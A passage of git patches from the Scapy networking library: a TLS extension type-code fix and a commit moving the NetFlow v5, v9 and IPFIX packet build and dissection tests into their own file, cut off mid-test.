0xb25e +# VRRPv1 +p = Ether(src="00:00:5e:00:02:02",dst="01:00:5e:00:00:12")/IP(src="20.0.0.3", dst="224.0.0.18",ttl=255)/VRRP(priority=254,vrid=2,version=1,adv=1,addrlist=["20.0.1.2","20.0.1.3"]) +b = Ether(raw(p)) +assert b[VRRP].chksum == 0xc6f4 + += VRRP IPv6 - chksums +# VRRPv3 IPv6 +p = Ether(src="00:00:5e:00:02:02",dst="33:33:00:00:00:12")/IPv6(src="2001:db8::1", dst="ff02::12",hlim=255)/VRRPv3(priority=254,vrid=2,version=3,adv=1,ipcount=2,addrlist=["2001:db8::2","2001:db8::3"]) +c = Ether(raw(p)) +assert c[VRRPv3].chksum == 0x481b From dd0862365fb8df0849e98688e93f73516527f1bb Mon Sep 17 00:00:00 2001 From: GSBHub Date: Fri, 30 Oct 2020 12:35:25 -0400 Subject: [PATCH 0362/1632] fixes #2930 --- scapy/layers/tls/extensions.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/tls/extensions.py b/scapy/layers/tls/extensions.py index 8e1e8da9189..86dea5c11a5 100644 --- a/scapy/layers/tls/extensions.py +++ b/scapy/layers/tls/extensions.py @@ -657,7 +657,7 @@ class TLS_Ext_PostHandshakeAuth(TLS_Ext_Unknown): # RFC 8446 class TLS_Ext_SignatureAlgorithmsCert(TLS_Ext_Unknown): # RFC 8446 name = "TLS Extension - Signature Algorithms Cert" - fields_desc = [ShortEnumField("type", 0x31, _tls_ext), + fields_desc = [ShortEnumField("type", 0x32, _tls_ext), ShortField("len", None), SigAndHashAlgsLenField("sig_algs_len", None, length_of="sig_algs"), From a1215e746b985b2f9ebf1528ec658d93b335b30f Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 31 Oct 2020 09:43:30 +0100 Subject: [PATCH 0363/1632] Standalone NetFlow unit tests Co-authored-by: Phil Co-authored-by: Gabriel Co-authored-by: Ivan Balan Co-authored-by: Guillaume Valadon Co-authored-by: Volodymyr Fialko Co-authored-by: Haiyu Yang --- test/regression.uts | 258 ---------------------------------- test/scapy/layers/netflow.uts | 258 ++++++++++++++++++++++++++++++++++ 2 files changed, 258 insertions(+), 258 deletions(-) create mode 100644 test/scapy/layers/netflow.uts diff --git a/test/regression.uts b/test/regression.uts index d3a131228d0..fe90cd38839 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -5302,247 +5302,6 @@ p = IPv6(s) p[MIP6MH_BE].cksum=0xba10 and p[MIP6MH_BE].len == 1 and len(p[MIP6MH_BE].options) == 1 -############ -############ -+ Netflow v5 -~ netflow - -= NetflowHeaderV5 - basic building - -raw(NetflowHeader()/NetflowHeaderV5()) == b'\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -raw(NetflowHeaderV5(engineID=42)) == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00*\x00\x00' - -raw(NetflowRecordV5(dst="192.168.0.1")) == b'\x7f\x00\x00\x01\xc0\xa8\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -raw(NetflowHeader()/NetflowHeaderV5(count=1)/NetflowRecordV5(dst="192.168.0.1")) == b'\x00\x05\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x00\x00\x01\xc0\xa8\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -raw(NetflowHeader()/NetflowHeaderV5()/NetflowRecordV5(dst="192.168.0.1")/NetflowRecordV5(dst="172.16.0.1")) == b'\x00\x05\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x00\x00\x01\xc0\xa8\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x00\x00\x01\xac\x10\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00' - - -= NetflowHeaderV5 - UDP bindings - -s = raw(IP(src="127.0.0.1")/UDP()/NetflowHeader()/NetflowHeaderV5()) -assert s == b'E\x00\x004\x00\x01\x00\x00@\x11|\xb6\x7f\x00\x00\x01\x7f\x00\x00\x01\x08\x07\x08\x07\x00 \xf1\x98\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -pkt = IP(s) -assert NetflowHeaderV5 in pkt - -= NetflowHeaderV5 - basic dissection - -nf5 = NetflowHeader(b'\x00\x05\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00') -nf5.version == 5 and nf5[NetflowHeaderV5].count == 2 and isinstance(nf5[NetflowRecordV5].payload, NetflowRecordV5) - -############ -############ -+ Netflow v9 -~ netflow - -= NetflowV9 - advanced dissection - -import os -tmp = "/test/pcaps/netflowv9.pcap" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename -a = rdpcap(filename) -a = netflowv9_defragment(a) - -nfv9_fl = a[0] -assert NetflowFlowsetV9 in nfv9_fl -assert len(nfv9_fl.templates[0].template_fields) == 21 -assert nfv9_fl.templates[0].template_fields[1].fieldType == 12 - -nfv9_ds = a[3] -assert NetflowDataflowsetV9 in nfv9_ds -assert len(nfv9_ds[NetflowDataflowsetV9].records) == 24 -assert nfv9_ds[NetflowDataflowsetV9].records[21].IP_PROTOCOL_VERSION == 4 -assert nfv9_ds.records[21].IPV4_SRC_ADDR == '20.0.0.248' -assert nfv9_ds.records[21].IPV4_DST_ADDR == '30.0.0.248' - -nfv9_options_fl = a[1] -assert NetflowOptionsFlowsetV9 in nfv9_options_fl -assert isinstance(nfv9_options_fl[NetflowOptionsFlowsetV9].scopes[0], NetflowOptionsFlowsetScopeV9) -assert isinstance(nfv9_options_fl[NetflowOptionsFlowsetV9].options[0], NetflowOptionsFlowsetOptionV9) -assert nfv9_options_fl[NetflowOptionsFlowsetV9].options[0].optionFieldType == 36 - -nfv9_options_ds = a[4] -assert NetflowDataflowsetV9 in nfv9_options_ds -assert isinstance(nfv9_options_ds.records[0], NetflowOptionsRecordScopeV9) -assert nfv9_options_ds.records[0].IN_BYTES == b'\x01\x00\x00\x00' -assert nfv9_options_ds.records[1].SAMPLING_INTERVAL == 12 -assert nfv9_options_ds.records[1].SAMPLING_ALGORITHM == 0x2 - -= NetflowV9 - Multiple FlowSets in one packet - -nfv9_multiple_flowsets = NetflowHeader(b'\x00\t\x00\x03\x00\x00K [F\x17\x97\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00H\x04\x00\x00\x10\x00\x08\x00\x04\x00\x0c\x00\x04\x00\x15\x00\x04\x00\x16\x00\x04\x00\x01\x00\x08\x00\x02\x00\x08\x00\n\x00\x04\x00\x0e\x00\x04\x00\x07\x00\x02\x00\x0b\x00\x02\x00\x04\x00\x01\x00\x06\x00\x01\x00<\x00\x01\x00\x05\x00\x01\x00 \x00\x02\x00:\x00\x02\x00\x00\x00L\x08\x00\x00\x11\x00\x1b\x00\x10\x00\x1c\x00\x10\x00\x1f\x00\x04\x00\x15\x00\x04\x00\x16\x00\x04\x00\x01\x00\x08\x00\x02\x00\x08\x00\n\x00\x04\x00\x0e\x00\x04\x00\x07\x00\x02\x00\x0b\x00\x02\x00\x04\x00\x01\x00\x06\x00\x01\x00<\x00\x01\x00\x05\x00\x01\x00 \x00\x02\x00:\x00\x02\x04\x00\x008\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x00\x10\xac\x00\x00\x10\x83\x00\x00\x00\x00\x00\x00\x0b\xb8\x00\x00\x00\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x01\x005\x005\x11\x00\x04\x00\x00\x00\x00e') -assert nfv9_multiple_flowsets.haslayer(NetflowFlowsetV9) -assert nfv9_multiple_flowsets.haslayer(NetflowDataflowsetV9) -nfv9_defrag = netflowv9_defragment(list(nfv9_multiple_flowsets)) -flowset1 = nfv9_defrag[0].getlayer(NetflowFlowsetV9, 1) -assert flowset1.templates[0].template_fields[0].fieldType == 8 -assert flowset1.templates[0].template_fields[0].fieldLength == 4 -assert flowset1.templates[0].template_fields[5].fieldType == 2 -assert flowset1.templates[0].template_fields[5].fieldLength == 8 -flowset2 = nfv9_defrag[0].getlayer(NetflowFlowsetV9, 2) -assert flowset2.templates[0].template_fields[0].fieldType == 27 -assert flowset2.templates[0].template_fields[0].fieldLength == 16 -assert flowset2.templates[0].template_fields[5].fieldType == 1 -assert flowset2.templates[0].template_fields[5].fieldLength == 8 -assert nfv9_defrag[0].getlayer(NetflowFlowsetV9, 2) -assert nfv9_defrag[0].records[0].IP_PROTOCOL_VERSION == 4 -assert nfv9_defrag[0].records[0].PROTOCOL == 17 -assert nfv9_defrag[0].records[0].IPV4_SRC_ADDR == "127.0.0.1" - -= NetflowV9 - build and dissection -~ netflow - -header = Ether()/IP()/UDP() -netflow_header = NetflowHeader()/NetflowHeaderV9() - -flowset = NetflowFlowsetV9( - templates=[NetflowTemplateV9( - template_fields=[ - NetflowTemplateFieldV9(fieldType=1, fieldLength=1), # IN_BYTES - NetflowTemplateFieldV9(fieldType=2, fieldLength=4), # IN_PKTS - NetflowTemplateFieldV9(fieldType=4), # PROTOCOL - NetflowTemplateFieldV9(fieldType=8), # IPV4_SRC_ADDR - NetflowTemplateFieldV9(fieldType=12), # IPV4_DST_ADDR - ], - templateID=256, - fieldCount=5) - ], - flowSetID=0 -) -recordClass = GetNetflowRecordV9(flowset) -dataFS = NetflowDataflowsetV9( - templateID=256, - records=[ # Some random data. - recordClass( - IN_BYTES=b"\x12", - IN_PKTS=b"\0\0\0\0", - PROTOCOL=6, - IPV4_SRC_ADDR="192.168.0.10", - IPV4_DST_ADDR="192.168.0.11" - ), - ], -) - -pkt = netflow_header / flowset / dataFS -assert raw(pkt) == b'\x00\t\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x01\x00\x00\x05\x00\x01\x00\x01\x00\x02\x00\x04\x00\x04\x00\x01\x00\x08\x00\x04\x00\x0c\x00\x04\x01\x00\x00\x14\x12\x00\x00\x00\x00\x06\xc0\xa8\x00\n\xc0\xa8\x00\x0b\x00\x00' - -pkt = header / netflow_header / flowset / dataFS -pkt = netflowv9_defragment(Ether(raw(pkt)))[0] - -assert NetflowDataflowsetV9 in pkt -assert len(pkt[NetflowDataflowsetV9].records) == 1 -assert pkt[NetflowDataflowsetV9].records[0].IPV4_DST_ADDR == "192.168.0.11" - -= NetflowV9 - advanced build -~ netflow - -atm_time = 1547927349.328283 - -header = Ether(src="00:00:00:00:00:00", dst="aa:aa:aa:aa:aa:aa")/IP(dst="127.0.0.1", src="127.0.0.1")/UDP()/NetflowHeader()/NetflowHeaderV9(unixSecs=atm_time) -flowset = NetflowFlowsetV9(templates=[NetflowTemplateV9(template_fields=[NetflowTemplateFieldV9(fieldType=8, fieldLength=4),NetflowTemplateFieldV9(fieldType=12, fieldLength=4),NetflowTemplateFieldV9(fieldType=5, fieldLength=1),NetflowTemplateFieldV9(fieldType=4, fieldLength=1),NetflowTemplateFieldV9(fieldType=7, fieldLength=2),NetflowTemplateFieldV9(fieldType=11, fieldLength=2),NetflowTemplateFieldV9(fieldType=32, fieldLength=2),NetflowTemplateFieldV9(fieldType=10, fieldLength=4),NetflowTemplateFieldV9(fieldType=16, fieldLength=4),NetflowTemplateFieldV9(fieldType=17, fieldLength=4),NetflowTemplateFieldV9(fieldType=18, fieldLength=4),NetflowTemplateFieldV9(fieldType=14, fieldLength=4),NetflowTemplateFieldV9(fieldType=1, fieldLength=4),NetflowTemplateFieldV9(fieldType=2, fieldLength=4),NetflowTemplateFieldV9(fieldType=22, fieldLength=4),NetflowTemplateFieldV9(fieldType=21, fieldLength=4),NetflowTemplateFieldV9(fieldType=15, fieldLength=4),NetflowTemplateFieldV9(fieldType=9, fieldLength=1),NetflowTemplateFieldV9(fieldType=13, fieldLength=1),NetflowTemplateFieldV9(fieldType=6, fieldLength=1),NetflowTemplateFieldV9(fieldType=60, fieldLength=1)], templateID=424, fieldCount=21)], flowSetID=0, length=92) -dataflowset = NetflowDataflowsetV9(records=[NetflowRecordV9(fieldValue=b'\x14\x00\x00\xfd\x1e\x00\x00\xfd\x00\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x03 \x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02\xfb\x00\x15a|\x00\x00\x07\x0f$\x95x\xed$\x99\x91<\ndg\x01 \x00\x04')], templateID=424) - -pkt = netflowv9_defragment(list(header/flowset/dataflowset))[0] -assert pkt.records[0].IPV4_NEXT_HOP == "10.100.103.1" -assert pkt.records[0].OUTPUT_SNMP == b'\x00\x00\x02\xfb' - -assert raw(pkt) == b'\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x00\x00\x00\x08\x00E\x00\x00\xcc\x00\x01\x00\x00@\x11|\x1e\x7f\x00\x00\x01\x7f\x00\x00\x01\x08\x07\x08\x07\x00\xb8\x86\xe7\x00\t\x00\x02\x00\x00\x00\x00\\C\x7f5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\\x01\xa8\x00\x15\x00\x08\x00\x04\x00\x0c\x00\x04\x00\x05\x00\x01\x00\x04\x00\x01\x00\x07\x00\x02\x00\x0b\x00\x02\x00 \x00\x02\x00\n\x00\x04\x00\x10\x00\x04\x00\x11\x00\x04\x00\x12\x00\x04\x00\x0e\x00\x04\x00\x01\x00\x04\x00\x02\x00\x04\x00\x16\x00\x04\x00\x15\x00\x04\x00\x0f\x00\x04\x00\t\x00\x01\x00\r\x00\x01\x00\x06\x00\x01\x00<\x00\x01\x01\xa8\x00@\x14\x00\x00\xfd\x1e\x00\x00\xfd\x00\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x03 \x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02\xfb\x00\x15a|\x00\x00\x07\x0f$\x95x\xed$\x99\x91<\ndg\x01 \x00\x04' - -= NetflowV9 - padding #GH2257 - -dat = hex_bytes("fb200807007840a10009000277efe9c450c843f900362202000000000001001801000004000800010000002a00040029000400000101004477ef819077ef81900000003c00000001009300930ac900640ac9033b060009ee0b3500000ac9033b131302000000000000260bdc69aa6480996649a000000000") -pkt = UDP(dat) -assert pkt[NetflowOptionsFlowsetV9].pad == b"\x00\x00" -pkt[NetflowOptionsFlowsetV9].pad = None -assert raw(pkt) == dat - - -############ -############ -+ Netflow v10 (aka IPFix) -~ netflow - -= IPFix dissection - -import os -tmp = "/test/pcaps/ipfix.pcap" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename -a = sniff(offline=filename, session=NetflowSession) - -# Templates -pkt1 = a[0] -assert NetflowHeaderV10 in pkt1 -assert len(pkt1[NetflowFlowsetV9].templates) == 1 -assert len(pkt1[NetflowFlowsetV9].templates[0].template_fields) == 23 -flds = pkt1[NetflowFlowsetV9].templates[0].template_fields -assert (flds[0].fieldType == 8 and flds[0].fieldLength == 4) -assert (flds[4].fieldType == 7 and flds[4].fieldLength == 2) - -# Data -pkt2 = a[2] -assert NetflowHeaderV10 in pkt2 -assert len(pkt2.records) == 1 -assert pkt2.records[0].IPV4_SRC_ADDR == "70.1.115.1" -assert pkt2.records[0].flowStartMilliseconds == 1480449931519 - -# Options -pkt3 = a[1] -assert NetflowOptionsFlowset10 in pkt3 -assert pkt3.scope_field_count == 1 -assert pkt3.field_count == 3 -assert len(pkt3[NetflowOptionsFlowset10].scopes) == 1 -assert len(pkt3[NetflowOptionsFlowset10].options) == 2 -assert pkt3.scopes[0].scopeFieldType == 5 -assert pkt3.scopes[0].scopeFieldlength == 2 -assert pkt3[NetflowOptionsFlowset10].options[0].optionFieldType == 36 - -# Templates with enterprise-specific Information Elements. -s=b'\x01\x07\x00\x12\x01\n\x00\x04\x84\x0c\x00\x02\x00\x00\x00\t\x01\n\x00&\x00\x0b\x00\x02\x00\x07\x00\x02\x00\x04\x00\x01\x00\x0c\x00\x04\x00\x08\x00\x04\x00\xea\x00\x02\x01\n\x00\x01\x84\x10\x00\x06\x00\x00\x00\t\x84\x0e\x00\x06\x00\x00\x00\t\x84\x0f\x00\x06\x00\x00\x00\t\x00\x01\x00\x04\x00\x02\x00\x04\x00\xf3\x00\x02\x00\x06\x00\x01\x01\n\x00#' -pkt4 = NetflowTemplateV9(s) -assert len(pkt4.template_fields) == pkt4.fieldCount -assert sum([template.fieldLength for template in pkt4.template_fields]) == 124 - -= NetflowV10/IPFIX - build - -netflow_header = NetflowHeader()/NetflowHeaderV10() - -flowset = NetflowFlowsetV9( - templates=[NetflowTemplateV9( - template_fields=[ - NetflowTemplateFieldV9(fieldType=1, fieldLength=1), # IN_BYTES - NetflowTemplateFieldV9(fieldType=2, fieldLength=4), # IN_PKTS - NetflowTemplateFieldV9(fieldType=4), # PROTOCOL - NetflowTemplateFieldV9(fieldType=8), # IPV4_SRC_ADDR - NetflowTemplateFieldV9(fieldType=12), # IPV4_DST_ADDR - ], - templateID=256, - fieldCount=5) - ], - flowSetID=0 -) -recordClass = GetNetflowRecordV9(flowset) -dataFS = NetflowDataflowsetV9( - templateID=256, - records=[ # Some random data. - recordClass( - IN_BYTES=b"\x12", - IN_PKTS=b"\0\0\0\0", - PROTOCOL=6, - IPV4_SRC_ADDR="192.168.0.10", - IPV4_DST_ADDR="192.168.0.11" - ), - ], -) - -pkt = netflow_header / flowset / dataFS -assert raw(pkt) == b'\x00\n\x00>\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x01\x00\x00\x05\x00\x01\x00\x01\x00\x02\x00\x04\x00\x04\x00\x01\x00\x08\x00\x04\x00\x0c\x00\x04\x01\x00\x00\x14\x12\x00\x00\x00\x00\x06\xc0\xa8\x00\n\xc0\xa8\x00\x0b\x00\x00' - - - ############ ############ + pcap / pcapng format support @@ -6009,23 +5768,6 @@ sniff(offline=tmp_file, session=IPSession, prn=callback) assert len(dissected_packets) == 1 assert raw(dissected_packets[0]) == raw(packet) -= NetflowSession - dissect packet NetflowV9 packets on-the-flow - -import os -tmp = "/test/pcaps/netflowv9.pcap" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename - -dissected_packets = [] -def callback(pkt): - dissected_packets.append(pkt) - -sniff(offline=filename, session=NetflowSession, prn=callback) -records = dissected_packets[3][NetflowDataflowsetV9].records -assert len(records) == 24 -assert records[0].IPV4_SRC_ADDR == '20.0.1.174' -assert records[0].IPV4_NEXT_HOP == '10.100.103.1' - = StringBuffer buffer = StringBuffer() diff --git a/test/scapy/layers/netflow.uts b/test/scapy/layers/netflow.uts new file mode 100644 index 00000000000..45610be891a --- /dev/null +++ b/test/scapy/layers/netflow.uts @@ -0,0 +1,258 @@ +% NetFlow regression tests for Scapy + + +############ +############ ++ Netflow v5 +~ netflow + += NetflowHeaderV5 - basic building + +raw(NetflowHeader()/NetflowHeaderV5()) == b'\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + +raw(NetflowHeaderV5(engineID=42)) == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00*\x00\x00' + +raw(NetflowRecordV5(dst="192.168.0.1")) == b'\x7f\x00\x00\x01\xc0\xa8\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00' + +raw(NetflowHeader()/NetflowHeaderV5(count=1)/NetflowRecordV5(dst="192.168.0.1")) == b'\x00\x05\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x00\x00\x01\xc0\xa8\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00' + +raw(NetflowHeader()/NetflowHeaderV5()/NetflowRecordV5(dst="192.168.0.1")/NetflowRecordV5(dst="172.16.0.1")) == b'\x00\x05\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x00\x00\x01\xc0\xa8\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x00\x00\x01\xac\x10\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00' + + += NetflowHeaderV5 - UDP bindings + +s = raw(IP(src="127.0.0.1")/UDP()/NetflowHeader()/NetflowHeaderV5()) +assert s == b'E\x00\x004\x00\x01\x00\x00@\x11|\xb6\x7f\x00\x00\x01\x7f\x00\x00\x01\x08\x07\x08\x07\x00 \xf1\x98\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +pkt = IP(s) +assert NetflowHeaderV5 in pkt + += NetflowHeaderV5 - basic dissection + +nf5 = NetflowHeader(b'\x00\x05\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00') +nf5.version == 5 and nf5[NetflowHeaderV5].count == 2 and isinstance(nf5[NetflowRecordV5].payload, NetflowRecordV5) + +############ +############ ++ Netflow v9 +~ netflow + += NetflowV9 - advanced dissection + +import os +tmp = "/test/pcaps/netflowv9.pcap" +filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp +filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename +a = rdpcap(filename) +a = netflowv9_defragment(a) + +nfv9_fl = a[0] +assert NetflowFlowsetV9 in nfv9_fl +assert len(nfv9_fl.templates[0].template_fields) == 21 +assert nfv9_fl.templates[0].template_fields[1].fieldType == 12 + +nfv9_ds = a[3] +assert NetflowDataflowsetV9 in nfv9_ds +assert len(nfv9_ds[NetflowDataflowsetV9].records) == 24 +assert nfv9_ds[NetflowDataflowsetV9].records[21].IP_PROTOCOL_VERSION == 4 +assert nfv9_ds.records[21].IPV4_SRC_ADDR == '20.0.0.248' +assert nfv9_ds.records[21].IPV4_DST_ADDR == '30.0.0.248' + +nfv9_options_fl = a[1] +assert NetflowOptionsFlowsetV9 in nfv9_options_fl +assert isinstance(nfv9_options_fl[NetflowOptionsFlowsetV9].scopes[0], NetflowOptionsFlowsetScopeV9) +assert isinstance(nfv9_options_fl[NetflowOptionsFlowsetV9].options[0], NetflowOptionsFlowsetOptionV9) +assert nfv9_options_fl[NetflowOptionsFlowsetV9].options[0].optionFieldType == 36 + +nfv9_options_ds = a[4] +assert NetflowDataflowsetV9 in nfv9_options_ds +assert isinstance(nfv9_options_ds.records[0], NetflowOptionsRecordScopeV9) +assert nfv9_options_ds.records[0].IN_BYTES == b'\x01\x00\x00\x00' +assert nfv9_options_ds.records[1].SAMPLING_INTERVAL == 12 +assert nfv9_options_ds.records[1].SAMPLING_ALGORITHM == 0x2 + += NetflowV9 - Multiple FlowSets in one packet + +nfv9_multiple_flowsets = NetflowHeader(b'\x00\t\x00\x03\x00\x00K [F\x17\x97\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00H\x04\x00\x00\x10\x00\x08\x00\x04\x00\x0c\x00\x04\x00\x15\x00\x04\x00\x16\x00\x04\x00\x01\x00\x08\x00\x02\x00\x08\x00\n\x00\x04\x00\x0e\x00\x04\x00\x07\x00\x02\x00\x0b\x00\x02\x00\x04\x00\x01\x00\x06\x00\x01\x00<\x00\x01\x00\x05\x00\x01\x00 \x00\x02\x00:\x00\x02\x00\x00\x00L\x08\x00\x00\x11\x00\x1b\x00\x10\x00\x1c\x00\x10\x00\x1f\x00\x04\x00\x15\x00\x04\x00\x16\x00\x04\x00\x01\x00\x08\x00\x02\x00\x08\x00\n\x00\x04\x00\x0e\x00\x04\x00\x07\x00\x02\x00\x0b\x00\x02\x00\x04\x00\x01\x00\x06\x00\x01\x00<\x00\x01\x00\x05\x00\x01\x00 \x00\x02\x00:\x00\x02\x04\x00\x008\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x00\x10\xac\x00\x00\x10\x83\x00\x00\x00\x00\x00\x00\x0b\xb8\x00\x00\x00\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x01\x005\x005\x11\x00\x04\x00\x00\x00\x00e') +assert nfv9_multiple_flowsets.haslayer(NetflowFlowsetV9) +assert nfv9_multiple_flowsets.haslayer(NetflowDataflowsetV9) +nfv9_defrag = netflowv9_defragment(list(nfv9_multiple_flowsets)) +flowset1 = nfv9_defrag[0].getlayer(NetflowFlowsetV9, 1) +assert flowset1.templates[0].template_fields[0].fieldType == 8 +assert flowset1.templates[0].template_fields[0].fieldLength == 4 +assert flowset1.templates[0].template_fields[5].fieldType == 2 +assert flowset1.templates[0].template_fields[5].fieldLength == 8 +flowset2 = nfv9_defrag[0].getlayer(NetflowFlowsetV9, 2) +assert flowset2.templates[0].template_fields[0].fieldType == 27 +assert flowset2.templates[0].template_fields[0].fieldLength == 16 +assert flowset2.templates[0].template_fields[5].fieldType == 1 +assert flowset2.templates[0].template_fields[5].fieldLength == 8 +assert nfv9_defrag[0].getlayer(NetflowFlowsetV9, 2) +assert nfv9_defrag[0].records[0].IP_PROTOCOL_VERSION == 4 +assert nfv9_defrag[0].records[0].PROTOCOL == 17 +assert nfv9_defrag[0].records[0].IPV4_SRC_ADDR == "127.0.0.1" + += NetflowV9 - build and dissection +~ netflow + +header = Ether()/IP()/UDP() +netflow_header = NetflowHeader()/NetflowHeaderV9() + +flowset = NetflowFlowsetV9( + templates=[NetflowTemplateV9( + template_fields=[ + NetflowTemplateFieldV9(fieldType=1, fieldLength=1), # IN_BYTES + NetflowTemplateFieldV9(fieldType=2, fieldLength=4), # IN_PKTS + NetflowTemplateFieldV9(fieldType=4), # PROTOCOL + NetflowTemplateFieldV9(fieldType=8), # IPV4_SRC_ADDR + NetflowTemplateFieldV9(fieldType=12), # IPV4_DST_ADDR + ], + templateID=256, + fieldCount=5) + ], + flowSetID=0 +) +recordClass = GetNetflowRecordV9(flowset) +dataFS = NetflowDataflowsetV9( + templateID=256, + records=[ # Some random data. + recordClass( + IN_BYTES=b"\x12", + IN_PKTS=b"\0\0\0\0", + PROTOCOL=6, + IPV4_SRC_ADDR="192.168.0.10", + IPV4_DST_ADDR="192.168.0.11" + ), + ], +) + +pkt = netflow_header / flowset / dataFS +assert raw(pkt) == 